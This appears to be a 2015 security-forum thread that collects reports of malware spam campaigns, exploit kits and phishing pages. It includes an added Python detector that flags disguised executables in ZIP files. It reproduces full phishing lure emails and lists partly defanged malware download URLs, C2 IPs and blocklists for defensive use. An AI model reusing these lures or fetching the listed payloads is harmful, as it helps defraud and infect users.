* https://www.virustotal.com/en-gb/file/da1dc627acabdbc7e42b0968e8c24e4e71d4fc00399ec9a8ceeb0bb195cec2bf/analysis/1435729795/
** https://www.virustotal.com/en-gb/file/a7396d675e563b2dcd3a2a3ad6460d094bffcac9ef7044263063feb0ddd66a52/analysis/1435729826/
*** https://www.virustotal.com/en-gb/file/7fc8781983035da87ec101aece8fba9eb786d937d16f6efb13f30eafaefb2381/analysis/1435729851/
fresh-start-shopping .com: 192.186.246.136: https://www.virustotal.com/en/ip-address/192.186.246.136/information/
gode-film .dk: 81.19.232.168: https://www.virustotal.com/en/ip-address/81.19.232.168/information/
___
Fake 'HMRC taxes application' SPAM - leads to malware
- http://blog.dynamoo.com/2015/07/malware-spam-hmrc-taxes-application.html
1 July 2015 - "This -fake- tax spam leads to malware:
From "noreply@ taxreg.hmrc .gov.uk" [noreply@ taxreg .hmrc .gov.uk]
Date Wed, 1 Jul 2015 11:20:37 +0000
Subject HMRC taxes application with reference L4TI 2A0A UWSV WASP received
The application with reference number L4TI 2A0A UWSV WASP submitted by you or your
agent to register for HM Revenue & Customs (HMRC) taxes has been received and will
now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here: http ://quadroft .com/secure_storage/get_document.html
The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate
Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded
for legal purposes.d
If you have the correct browser agent (e.g. Internet Explorer 8 on Windows) you will see a "Your document will download shortly.." notice. If you have something else, a fake -404- page will be generated:
> https://1.bp.blogspot.com/-8-KFWqr7bvc/VZPQVakQH7I/AAAAAAAAGvY/UPY9foHUjEw/s1600/document.png
The page then forwards to the real HMRC login page but attempts to dump a -malicious- ZIP from another source at the same time:
> https://2.bp.blogspot.com/-Nuz7HP-XSSs/VZPQwIyZjOI/AAAAAAAAGvg/aXHCFba_yMw/s400/fake-hmrc.png
In this case, the ZIP file was Document_HM901417.zip which contains a -malicious- executable Document_HM901417.exe. This has a VirusTotal detection rate of 3/55* (identified as the Upatre downloader). Automated analysis... shows attempted traffic to 93.185.4.90 (C2NET, Czech Republic) and a dropped executable with a random name and an MD5 of ba841ac5f7500b6ea59fcbbfd4d8da32 with a detection rate of 2/55**. The payload is almost definitely the Dyre banking trojan.
* https://www.virustotal.com/en/file/ab036a9c324ad09ab36d3d805e5bcdc8be8103ceb7db3dd5f95dafa1054b96c0/analysis/1435748839/
** https://www.virustotal.com/en/file/8fe73af085c528f4c891757998e7775d68b907678120d8022bbe9cd359b55146/analysis/1435750980/
93.185.4.90: https://www.virustotal.com/en/ip-address/93.185.4.90/information/
___
Fake 'Document Order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/document-order-555-073766-247073771-companies-house-webfiling-word-doc-or-excel-xls-spreadsheet-malware/
1 July 2015 - "'Document Order 555-073766-24707377/1' (random numbers) pretending to come from web-filing@ companies-house .gov.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Order: 555-073766-24707377 29/06/2015 09:35:46
Companies House WebFiling order 555-073766-24707377/1 is attached.
Thank you for using the Companies House WebFiling service.
Email: enquiries@ companies-house .gov.uk Telephone +44 (0)303 1234 500
Note: This email was sent from a notification-only email address which cannot accept incoming email. Please do not reply directly to this message.
1 July 2015: compinfo_555-073766-24707377_1.doc - Current Virus total detections: 4/56*
... Downloads Dridex banking malware from:
http ://ferringvillage .co.uk/75/85.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a831b3e3da00d15a3ab8fe2b67ca5f8641a98715a8ae985acbab90f119d0407d/analysis/1435735503/
** https://www.virustotal.com/en/file/356537501b4d5758471e126a4588d5edd17108164f44846a002af98cfc9d3e06/analysis/1435735797/
ferringvillage .co.uk: 217.72.186.4: https://www.virustotal.com/en/ip-address/217.72.186.4/information/
___
Fake 'Underreported Income' SPAM - links to malware
- http://blog.dynamoo.com/2015/07/malware-spam-notice-of-underreported.html
1 July 2015 - "The second HMRC spam run of the day..
From: HM Revenue and Customs [noreply@ hmrc .gov.uk]
Date: 1 July 2015 at 11:36
Subject: Notice of Underreported Income
Taxpayer ID: ufwsd-000004152670UK
Tax Type: Income Tax
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax income statement on HM Revenue and Customs ( HMRC ).Download your HMRC statement.
Please complete the form. You can download HMRC Form herc
In this case, the link goes to bahiasteel .com/secure_storage/get_document.html however, the payload is Upatre leading to the Dyre banking trojan, as seen in this other spam run* today."
* http://blog.dynamoo.com/2015/07/malware-spam-hmrc-taxes-application.html
bahiasteel .com: 213.186.33.16: https://www.virustotal.com/en/ip-address/213.186.33.16/information/
___
Fake 'Statement' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/statement-jul-2015-phil-twococksbrewery-com-word-doc-or-excel-xls-spreadsheet-malware/
1 July 2015 - "'Statement JUL-2015' pretending to come from Phil <phil@ twococksbrewery .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-LogMeIn-Pro-payment-has-been-processed.png
25 February 2015: logmein_pro_receipt.xls - Current Virus total detections: 7/55*
... Which downloads the -same- Dridex banking malware as today’s earlier examples 'Document Order 555-073766-24707377/1- Companies House WebFiling** – word doc or excel xls spreadsheet malware and 'Document Order 555-073766-24707377/1- Companies House WebFiling*** – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/29780fbaf1c7b83b408669fcb587fd6b3d4630c00f1d936e5a6ec46360125f34/analysis/1435755731/
** http://myonlinesecurity.co.uk/document-order-555-073766-247073771-companies-house-webfiling-word-doc-or-excel-xls-spreadsheet-malware/
*** http://myonlinesecurity.co.uk/document-order-555-073766-247073771-companies-house-webfiling-word-doc-or-excel-xls-spreadsheet-malware/
:fear::fear: :mad:
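The HMRC run above ends with a ZIP whose single member is an executable, and the same disguise recurs throughout this thread with PDF icons and document-like names. A mail-gateway style check should therefore look at both the member extension and the first bytes of the member, since an executable renamed to .pdf still starts with the MZ header. This is an added example, not the blog's or any product's code; the archive is built in memory from constructed sample data.

```python
import io
import zipfile

# Extensions Windows will execute directly; extend as policy requires.
EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
PE_MAGIC = b"MZ"  # start of a DOS/PE header; no PDF, DOC or TXT begins this way


def suspicious_members(zip_bytes):
    """Return [(member_name, reason)] for archive members a gateway should quarantine.

    The content check runs first so a PE hiding behind 'statement.pdf' (the spoofed
    icon trick) is caught; the extension check then covers scripts and other runnable
    types that have no fixed magic bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            with zf.open(info) as member:
                head = member.read(2)
            if head == PE_MAGIC:
                findings.append((name, "PE header (MZ) regardless of extension"))
            elif ext in EXEC_EXTENSIONS:
                findings.append((name, f"executable extension {ext}"))
    return findings


def build_sample_zip(members):
    """Construct a ZIP in memory from {name: bytes}; test data, not a real attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample modelled on the spam pattern: an .exe, a PE disguised as a PDF,
# and a harmless text file. The 'MZ' stubs are padding, not a real program.
SAMPLE_ZIP = build_sample_zip({
    "Document_HM901417.exe": b"MZ\x90\x00" + b"\x00" * 60,
    "statement.pdf": b"MZ\x90\x00" + b"\x00" * 60,
    "readme.txt": b"plain text, nothing to see",
})

if __name__ == "__main__":
    for name, reason in suspicious_members(SAMPLE_ZIP):
        print(f"QUARANTINE {name}: {reason}")
```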
AplusWebMaster
2015-07-02, 14:43
FYI...
Angler Exploit Kit pushing CryptoWall 3.0
- https://isc.sans.edu/diary.html?storyid=19863
2015-07-02 - "... Recently, this EK has been altering its URL patterns on a near-daily basis. The changes accumulate, and you might not recognize current traffic generated by Angler... Angler pushes different payloads, but we're still seeing a lot of CryptoWall 3.0 from this EK. We first noticed CryptoWall 3.0 from Angler near the end of May 2015:
> https://isc.sans.edu/diaryimages/images/2015-07-02-ISC-diary-image-01.jpg
Traffic from Tuesday, 2015-07-01 shows Angler EK from 148.251.167.57 and 148.251.167.107 at different times during the day..."
(More detail at the isc URL above.)
148.251.167.57: https://www.virustotal.com/en/ip-address/148.251.167.57/information/
148.251.167.107: https://www.virustotal.com/en/ip-address/148.251.167.107/information/
___
The 'Grey Side' of Mobile Advertising
- https://blog.malwarebytes.org/mobile-2/2015/07/the-grey-side-of-mobile-advertising/
July 2, 2015 - "... Mobile advertising is a headache because of its intrusiveness, the amount of bandwidth used, and other unexpected nefarious behaviors. I get it, there’s money to be made–the good guys are trying to sell us something, the bad guys are trying to steal something, and the grey guys are doing a little of both. Grey hats do their work in between the good and the malicious sides of computing and often push the limits of maliciousness when it comes to making a quick buck. Some advertisers have been pushing this grey line by using shady tactics in order to get app installs for some time now. These pay-per-install ad campaigns use the same scarevertising* messaging we see from malware authors like: “You are infected” or “System Alert.” Unlike -fake- alerts that lead to malware, these alerts often -redirect- to legitimate apps residing in Google’s Play Store, like battery saving and security type apps... Most of these ad campaigns use the same wording, images, and fake scans used by malware authors. Because of this, we wanted to spread the word to ignore these ads and hopefully take away some of their impact. Shutting them down and tracking their creators have been difficult. The ads don’t stick around long and Ad Networks have a difficult time preventing them because of their small footprint compared to all the ‘good’ ad traffic–they get lost in the chaos.
Don’t fall for the bait. If you come across any of these -fake- messages you can back out of the page or close the tab to dismiss. If they persist it might be necessary to clear out browser history and cookies..."
* https://en.wikipedia.org/wiki/Scareware
:fear::fear: :mad:
AplusWebMaster
2015-07-06, 15:24
FYI...
Fake 'Statement' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/07/malware-spam-statement-as-at-30062015.html
6 July 2015 - "This -fake- financial spam does not come from Hobs Reprographics plc but instead is a simple forgery with a malicious attachment...
From: Manchester Accounts [manchester.accounts@ hobsrepro .com]
Date: 6 July 2015 at 07:10
Subject: Statement as at 30/06/2015
Please find attached statement from HOBS REPROGRAPHICS PLC as at
30/06/2015.
Please note that our payment terms are 30 days.
So far I have only seen one sample, with an attachment named ELLE013006.doc [VT 4/54*] which contains this malicious macro... which downloads a malicious executable from:
ozelduzensurucukursu .com/253/632.exe
... There are usually several versions of the document... The executable is saved as %TEMP%\blogdynamoocom.exe (see what they did there?) and has a VirusTotal detection rate of 1/50**. Automated analysis tools... indicate that the malware phones home to:
62.210.214.106 (OVH, France)
93.89.224.97 (Isimtescil, Cyprus)
87.236.215.151 (OneGbits, Lithuania)
The payload to this is almost definitely the Dridex banking trojan.
Recommended blocklist:
62.210.214.106
93.89.224.97
87.236.215.151 "
* https://www.virustotal.com/en/file/430f35ac1fc92a1935766677eb3cd8e983de606744ce1b638b9cd826434f6cd2/analysis/1436170412/
** https://www.virustotal.com/en/file/095a1f54fe71e6daadec7f928d6877ab4c81c1a680f1f30ee7b9ebf7f26b4af4/analysis/1436169984/
ozelduzensurucukursu .com: 93.89.224.97: https://www.virustotal.com/en/ip-address/93.89.224.97/information/
- http://myonlinesecurity.co.uk/statement-as-at-30062015-manchester-accounts-hobs-reprographics-plc-word-doc-or-excel-xls-spreadsheet-malware/
6 July 2015: ELLE013006.DOC - Current Virus total detections: 4/54*
... There are multiple different versions all of which will download a Dridex banking malware**"
* https://www.virustotal.com/en-gb/file/e0cdad58198db19c11f713ead3ee6cf17cbf9ce6b45255e955ce30b494c6562e/analysis/1436175110/
** https://www.virustotal.com/en-gb/file/666c728d093b39e796508d652a90fe75c9e636d307ab23ed921f542d1a4a983a/analysis/1436173972/
___
Fake 'reference' SPAM - PDF malware
- http://myonlinesecurity.co.uk/with-reference-to-telephone-conversation-tax-authority-senior-consultant-tax-officer-fake-pdf-malware/
6 July 2015 - "'With reference to telephone conversation' coming from random names and email addresses with a zip attachment is another one from the current bot runs... Some subjects seen in this series of emails which have been coming in almost every day for the last week or so include:
With reference to telephone conversation
Further to telephone communication
With reference to Skype discussion
Further to Skype communication
In In the course of telephone conversation
In In the course of telephone consultation
The email looks like:
With reference to yesterday telephone conversation could You send us the kits of books for affixed 2013 original of which is enclosed below.
Please be notified that mail information must contain following tracking No. 159724 for our convenience.
Please also send us a fragment of passport.
If You have any issues regarding provision of mentioned details as soon as possible please contact our legal department colleagues.
Pamela Nelson
Tax authority
-Or-
Further to earlier telephone discussion please dispatch us the packages of financial statements form-sheets years 2015 transcript of which has been enclosed below.
Please be notified that mail details must contain following tracking Numbers 740524 for our ease.
Be so kind to additionally send us an extract of ID.
In case You have any issues with regard to provision of mentioned information at the earliest convenience kindly call our legal office colleagues.
Anna Nelson
Tax authority
-Or-
Further to Tuesday telephone communication please forward to our address the kits of returns for affixed 2013 fragment of which has been attached above.
Please note that mail information ought to include following tracking Numbers 160428 for our convenience.
Be so kind to additionally forward us an transcript of identification.
If You have any problems regarding sending of mentioned information as soon as possible please call our legal office colleagues.
Diane Nelson
Senior Consultant
-Or-
With reference to our Skype discussion please forward us the kits of financial reports form-sheets affixed 2014 fragment of which has been attached to this e-mail.
Please be notified that dispatch information ought to include following tracking No. 887803 for our ease.
Be so kind to additionally send us a copy of identification.
Provided that Your colleagues have several issues regarding dispatch of requested information as early as can please call our contract office staff.
Jane Adams
Tax Officer
And hundreds of other similar worded emails with different numbers, people and positions.
06 July 2015: pattern_of_the_returns.zip: Extracts to: scan-copy_of_the_books.exe
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d6cf9504b2c72ce8cfe8906b453193da0d5c8858dc7f08e96c36e64580ef972f/analysis/1436180365/
___
BizCN gate actor changes from Fiesta to Nuclear exploit kit
- https://isc.sans.edu/diary.html?storyid=19875
Last Updated: 2015-07-06 - "An 'actor' using gates registered through BizCN recently switched from Fiesta to Nuclear exploit kit (EK)... domains used for the gate have all been registered through the Chinese registrar BizCN. We collected traffic and malware samples related to this actor from Friday 2015-07-03 through Sunday 2015-07-05. This traffic has the following characteristics:
• Compromised servers are usually (but not limited to) forum-style websites.
• Gate domains have all been registered through the Chinese registrar BizCN using privacy protection.
• The domains for Nuclear EK change every few hours and were registered through freenom .com.
Nuclear EK for this actor is on 107.191.63.163, which is an IP registered to Vultr, a hosting provider specializing in SSD cloud servers... The payload occasionally changes and includes malware identified as Yakes [1], Boaxxe [2], and Kovter. NOTE: For now, Kovter is relatively easy to spot, since it's the only malware I've noticed that updates the infected host's Flash player [3].
Chain of events: During a full infection chain, the traffic follows a specific chain of events. The compromised website has malicious javascript injected into the page that points to a URL hosted on a BizCN-registered gate domain. The gate domain redirects traffic to Nuclear EK on 107.191.63.163. If a Windows host running the web browser is vulnerable, Nuclear EK will infect it. Simply put, the chain of events is:
• Compromised website
• BizCN-registered gate domain
• Nuclear EK ..."
(More detail at the isc URL above.)
1] https://www.virustotal.com/en/file/b215e4cf122e3b829ce199c3e914263a6d635f968b4dc7b932482d7901691326/analysis/
2] https://www.virustotal.com/en/file/a0156a1641b42836e64d03d1a0d34cd93d3b041589b0422f8519cb68a4efb995/analysis/
3] http://malware.dontneedcoffee.com/2015/07/kovter-adfraud-is-updating-flash-for-you.html
107.191.63.163: https://www.virustotal.com/en/ip-address/107.191.63.163/information/
> http://malware-traffic-analysis.net/2015/07/05/index2.html
___
RIG exploit kit: Ransomware delivered through Google Drive...
- https://heimdalsecurity.com/blog/security-alert-ransonmware-google-drive-cryptowall-campaign/
July 2nd, 2015 - "... Heimdal Security has recently collected and analyzed a new drive-by campaign abusing vulnerabilities in various popular third-party products. In this campaign, the payload is delivered through the popular Google Drive platform. In the next stage, the payload downloads and runs CryptoWall from a long list of compromised webpages... On these compromised web pages, several malicious scripts force the user to a narrow selection of dedicated domains used in the campaign (more than 80 active domains). These domains makes use of a commercial exploit kit known as RIG, which will try to abuse vulnerabilities in JavaJRE, Adobe Reader, IE and Flash Player. If the victim’s system is not fully updated with the latest version of the software mentioned above, the RIG exploit kit will drop a file that contacts a series of predefined Google drive URLs..."
___
Hacking Team hacked, attackers claim 400GB in dumped data
- http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html
Jul 5, 2015 - "... Specializing in surveillance technology, 'Hacking Team' is now learning how it feels to have their internal matters exposed to the world, and privacy advocates are enjoying a bit of schadenfreude at their expense. Hacking Team is an Italian company that sells intrusion and surveillance tools to governments and law enforcement agencies... Reporters Without Borders has listed the company on its Enemies of the Internet index* due largely to Hacking Teams' business practices and their primary surveillance tool Da Vinci... It isn't known who hacked Hacking Team; however, the attackers have published a Torrent file with 400GB of internal documents, source code, and email communications to the public at large. In addition, the attackers have taken to Twitter, defacing the Hacking Team account with a new logo, biography, and published messages with images of the compromised data..."
* https://surveillance.rsf.org/en/hacking-team/
- http://www.theinquirer.net/inquirer/news/2416391/hacking-team-hacked-as-attackers-expose-400gb-of-corporate-data
Jul 06 2015
:fear::fear: :mad:
AplusWebMaster
2015-07-07, 20:06
FYI...
'Changed Identification Numbers' Spam
- http://threattrack.tumblr.com/post/123461472968/changed-identification-numbers-spam
July 7, 2015 - "Subjects Seen:
Changed identification numbers
Typical e-mail details:
Trust You are well.
Kindly see enclosed modified personal numbers regarding Your bank card.
Kindly confirm the safe recepiency of this letter and of enclosed codes.
Consider this message as strictly personal and never copy it to other entities.
Helen Jackson
Senior Consultant
Screenshot: https://36.media.tumblr.com/eb4e4902b22641b4ca2d0db6eb7e37c9/tumblr_inline_nr4fle4nSj1r6pupn_500.png
Malicious File Name and MD5:
transcript_of_perosnal_forms.exe (0166afeac63b594aa608dab85deddc07)
___
'Hilton Hotel Receipt' Spam
- http://threattrack.tumblr.com/post/123465692883/hilton-hotel-receipt-spam
July 7, 2015 - "Subjects Seen
A for guest WARDE SAID
Typical e-mail details:
Thank you for choosing our hotel and we very much hope that you enjoyed your stay with us.
Enclosed is a copy of your receipt(FOLIODETE_2317766.pdf). Should you require any further assistance please do not hesitate to contact us directly.
We look forward to welcoming you back in the near future.
This is an automatically generated message. Please do not reply to this email address.
Screenshot: https://40.media.tumblr.com/a0bffde5101dcd97699d93fec75acc82/tumblr_inline_nr4iy3iDOW1r6pupn_500.png
Malicious File Name and MD5:
FOLIODETE_0447019.exe (da3fd8a0905df536969e38468d5ca5c8)
___
Zombie 'Orkut' Phish...
- https://blog.malwarebytes.org/fraud-scam/2015/07/attack-of-the-zombie-orkut-phishing-pages/
July 7, 2015 - "... Orkut -was- a Google run social network, invite-only and very popular in places like Brazil, India and the US. Unfortunately, its users were frequent targets of scams, and I myself researched the first -Worm- on the Orkut network way back in 2006. Eventually, other Google services became more popular and the shutters came down for good in 2014:
> https://blog.malwarebytes.org/wp-content/uploads/2015/07/orkut1.jpg
This is done by logging into your Google Account, navigating to the relevant Archive section and being offered a mixture of original format files and HTML:
> https://blog.malwarebytes.org/wp-content/uploads/2015/07/orkut2.jpg
In other words, your still-dead Orkut account has a value attached, in the form of your entirely still-alive Google login. As a result, you’ll still occasionally come across the odd -fake- Orkut frontpage asking for credentials:
> https://blog.malwarebytes.org/wp-content/uploads/2015/07/orkut3.jpg
The above is located at:
lokoleonadinho(dot)xpg(dot)uol(dot)com(dot)br
The page reads as follows:
Who do you know?
Connect to your friends and family using scraps and instant messaging
Meet new people through friends of friends and communities
Share your videos, pictures and passions all in one place
Sign in to orkut with your
Google Account
There’s another one using the same layout and text at:
davitosta(dot)xpg(dot)uol(dot)com(dot)br
These Zombie Login pages are effective whether the scammer intended any sort of “Reclaim your data” riff or not – it doesn’t matter if the page is a regular Orkut login (the ones above are straight copies of the old Orkut frontpage), or geared towards reclaiming Takeout data. It doesn’t matter if the -fakes- were created last week, last month or last year. For as long as old users of Orkut associate it with a Google login, it will always be something that can be leveraged as a potential way in to a Google account whether Orkut is actually active or not. Should the unwary end up on an Orkut -phish- by chance, they may well assume the phony site is somehow the first step to grabbing their old information. With a few taps of the keyboard, their Google login will have been swiped (another good reason to use a password manager, incidentally, because they won’t go auto-filling your data on a fake website – assuming they have autofill and you’re making use of it, of course). A single sign on for multiple services is one way to lessen the impact on users where all of the products are managed by a single company, but this does mean that when one of those services fades into oblivion it can still end up being a gateway to phishing scams. Whether you have fond memories of Orkut, scrapbooks and the occasional worm or your first response is “Orkut on the what now”, be mindful of where you’re entering your Google login – there’s a time and a place for handing over your email and password, and the above two websites are most definitely -not- it."
:fear::fear: :mad:
AplusWebMaster
2015-07-08, 23:52
FYI...
Fake 'bank account' SPAM - malicious payload
- http://blog.dynamoo.com/2015/07/malware-spam-strange-bank-account.html
8 July 2015 - "This -fake- financial spam comes with a malicious payload. It appears to be randomly generated in part, here are some examples:
Date: 8 July 2015 at 18:02
Subject: Strange bank account operation
Kindly be informed that bank did noticed suspect attempt of money withdrawal relating to Your debit card.
Please find enclosed bank e-mail sent by financial department on Monday.
As well attached are security details for Your review.
Michael Morgan
Senior Manager
__
Date: 1 January 1970 at 00:00
Subject: Suspicious bank account operation
Kindly be acknowledged that bank had found unauthorised attempt of amounts withdrawal from Your credit card.
Please find enclosed bank warning provided by bank manager earlier.
Also enclosed are security details for Your affirmation.
Robin Owen
Chief accountant
__
Date: 8 July 2015 at 17:59
Subject: Illegal bank account transfer
Kindly be informed that bank security department has found illegal attempt of money withdrawal from Your Mastercard account.
Please check the enclosed bank publication provided by banking department today.
As well attached are security details for Your approval.
Clive Adams
Tax Consultant
__
Date: 8 July 2015 at 16:55
Subject: Strange bank account transfer
Kindly note that bank did noticed suspect attempt of amounts withdrawal related to Your Mastercard.
Please examine the enclosed bank statement sent by manager on Monday.
Furthermore attached are personal details for Your confirmation.
Martin Morgan
Tax authority
__
Date: 8 July 2015 at 17:51
Subject: Unauthorised bank account activity
Kindly be acknowledged that bank security department had detected suspect attempt of money withdrawal related to Your debit card.
Please check the enclosed bank statement forwarded by banking department today.
In addition attached are security details for Your control.
Robin Willis
Senior Manager
Attached is a Word document [VT 6/55*] with various filenames:
extract_of_bank_document.doc
fragment_of_bank_fax.doc
original_of_bank_report.doc
scan-copy_of_bank_document.doc
transcript_of_bank_statement.doc
All the samples I have seen have an identical document with different names, containing this malicious macro which then goes off and downloads various other components according to the Hybrid Analysis report, using the following URLs:
midwestlabradoodle .com/wp-content/plugins/really-simple-captcha/6727156315273.txt
artyouneed .com/wp-includes/theme-compat/6727156315273.txt
artyouneed .com/wp-includes/theme-compat/kaka.txt
These appear to download as a set of malicious scripts... which then download a further component from:
bluemagicwarranty .com/wp-includes/theme-compat/getrichtoday.exe
This binary has a detection rate of 3/55**. The Malwr report shows that it drops two other files, named as Zlatowef.exe [VT 3/55***] and redtytme4.exe [VT 9/55****] and it also downloads components from:
38.65.142.12 :12551/ON12/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
38.65.142.12 :12551/ON12/HOME/41/5/4/ELHBEDIBEHGBEHK
That IP is allocated to Cogent Communications in Mexico. The download is -Upatre- which means that the payload is almost definitely the Dyre banking trojan, even though the delivery mechanism of a Word document is unusual for Dyre."
Recommended blocklist:
38.65.142.12: https://www.virustotal.com/en/ip-address/38.65.142.12/information/
midwestlabradoodle .com: 72.167.131.160: https://www.virustotal.com/en/ip-address/72.167.131.160/information/
artyouneed .com: 50.63.50.1: https://www.virustotal.com/en/ip-address/50.63.50.1/information/
bluemagicwarranty .com: 173.201.216.40: https://www.virustotal.com/en/ip-address/173.201.216.40/information/
* https://www.virustotal.com/en/file/1776208ea6e0df6d30dfb3086af9841154a6e17e12c9287a7a29b5f16cdb4f24/analysis/1436383031/
** https://www.virustotal.com/en/file/e98507f12a0aa201d61f94a43a36d60c5d4e2babc6b01e5b398c9ac937c9f369/analysis/1436379366/
*** https://www.virustotal.com/en/file/e98507f12a0aa201d61f94a43a36d60c5d4e2babc6b01e5b398c9ac937c9f369/analysis/1436379366/
**** https://www.virustotal.com/en/file/1577a63154059c727022667889e8761930930c0870f3304f640e28f2f8eb3395/analysis/1436382709/
:fear::fear: :mad:
AplusWebMaster
2015-07-09, 14:53
FYI...
Fake 'Your order' SPAM - doc/xls spreadsheet malware
- http://myonlinesecurity.co.uk/your-order-no-3269637-has-been-despatched-123print-word-doc-or-excel-xls-spreadsheet-malware/
9 July 2015 - "'Your order No. 3269637 has been despatched' pretending to come from info@ 123print <info@ 123print .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear customer
Your order 3269637 has been despatched.
Please see attachment for details.
9 July 2015 : 4077774.doc - Current Virus total detections: 4/56*
... which downloads Dridex banking malware (VirusTotal**) from one of these locations
http ://illustramusic .com/43/82.exe
http ://prodasynth .com/43/82.exe
http ://jjsmith .it/43/82.exe
http ://robindesdroits .com/43/82.exe
http ://cabinet-marc-dugue .com/43/82.exe
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/0ddcf6bb44d3e3fc8b2bed152826bded28c10366dc8ef38cfee9313fb4267b5b/analysis/1436435418/
** https://www.virustotal.com/en-gb/file/f09c383ab73e21ea1c3c71518b758772c61c9f7cfe257d394dc03d38ec4a7a01/analysis/1436434288/
... Behavioural information
TCP connections
- http://blog.dynamoo.com/2015/07/malware-spam-your-order-no-3269637-has.html
9 July 2015
> https://www.virustotal.com/en/file/f09c383ab73e21ea1c3c71518b758772c61c9f7cfe257d394dc03d38ec4a7a01/analysis/1436444607/
"... Recommended blocklist:
62.210.214.106 "
___
Unsettled Traffic Fines Spam
- http://threattrack.tumblr.com/post/123643671948/unsettled-traffic-fines-spam
July 9, 2015 - "Subjects Seen
Unsettled traffic fines report
Typical e-mail details:
Kindly see enclosed traffic fines dispatched by State Road Traffic Safety Authority.
Please arrange settlement of penalties in a short time becuase aditional penalties can be imposed as a result of delayed settlement.
In addition check requisites of the document.
Robin Willis
Senior Manager
Screenshot: https://36.media.tumblr.com/5b4d651c8e279cae1b4f08cd2d061fb8/tumblr_inline_nr87vgeFl01r6pupn_500.png
Malicious File Name and MD5:
extract_of_issued_order.scr (cda3dd2862026cf5e1037f35b5660c2f)
Tagged: Upatre, traffic ticket
___
Fake 'AMEX Safe Key' SPAM – PDF malware
- http://myonlinesecurity.co.uk/american-express-safe-key-fake-pdf-malware/
9 July 2015 - "'American Express – Safe Key' pretending to come from American Express Customer Service <AmericanExpress@ welcome .aexp.com> with a link to download a zip attachment is another one from the current bot runs... The email looks like:
Amex Logo
Safe Key
Create your safe key now
Safe Key Logo
Please create your Personal Security Key. Personal Safe Key (PSK) is one of several authentication measures we utilize to ensure we are conducting business with you, and only you, when you contact us for assistance.American Express uses 128-bit Secure Sockets Layer (SSL) technology. This means that when you are on our secured website the data transferred between American Express and you is encrypted and cannot be viewed by any other party. The security of your personal information is of the utmost importance to American Express, please access https ://americanexpress .com to create your PSK (Personal Safe Key).
Note: You will be redirected to a secure encrypted website.
The contained message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.
Sincerely,
American Express Customer Service ...
9 July 2015: Personal Safe Key instruction.zip: Extracts to: Personal Safe Key instruction.scr
Current Virus total detections: 9/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/ffdcbae089a91278e03937d6683f16eb978cc85aefc0a6fead75bea4084e9d31/analysis/1436458305/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en-gb/ip-address/104.238.141.75/information/
38.65.142.12: https://www.virustotal.com/en-gb/ip-address/38.65.142.12/information/
24.148.217.188: https://www.virustotal.com/en-gb/ip-address/24.148.217.188/information/
2.22.48.170: https://www.virustotal.com/en-gb/ip-address/2.22.48.170/information/
:fear::fear: :mad:
AplusWebMaster
2015-07-10, 14:57
FYI...
Fake 'Invoice reminder' SPAM - PDF malware
- http://myonlinesecurity.co.uk/invoice-reminder-morgan-motor-co-uk-fake-pdf-malware/
10 July 2015 - "'Invoice reminder' pretending to come from random names @ morgan-motor .co.uk with a zip attachment is another one from the current bot runs... The email looks like:
Please note that so far we had not received the outstanding amounts in accordance with the invoice enclosed below.
Unfortunately, we cannot wait another week for amounts to be settled. Kindly ask You to arrange the payment in the nearest future (2 days).
In case the funds are not received in two days we reserve the right to use legal approaches in order to resolve this issue.
We hope You will duly react to this notification and save good business relationships with us.
10 July 2015: invoice-ITK709415.zip: Extracts to: invoice-ITK709415.scr
Current Virus total detections: 1/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2d6e3a5dec0e97ea0a29c9846ebe495584adde8eb750c0d14fd6b49dd6ecf3a1/analysis/1436525114/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en-gb/ip-address/104.238.136.31/information/
38.65.142.12: https://www.virustotal.com/en-gb/ip-address/38.65.142.12/information/
173.248.31.6: https://www.virustotal.com/en-gb/ip-address/173.248.31.6/information/
88.221.14.130: https://www.virustotal.com/en-gb/ip-address/88.221.14.130/information/
- http://blog.dynamoo.com/2015/07/malware-spam-invoice-reminder-morgan.html
10 July 2015
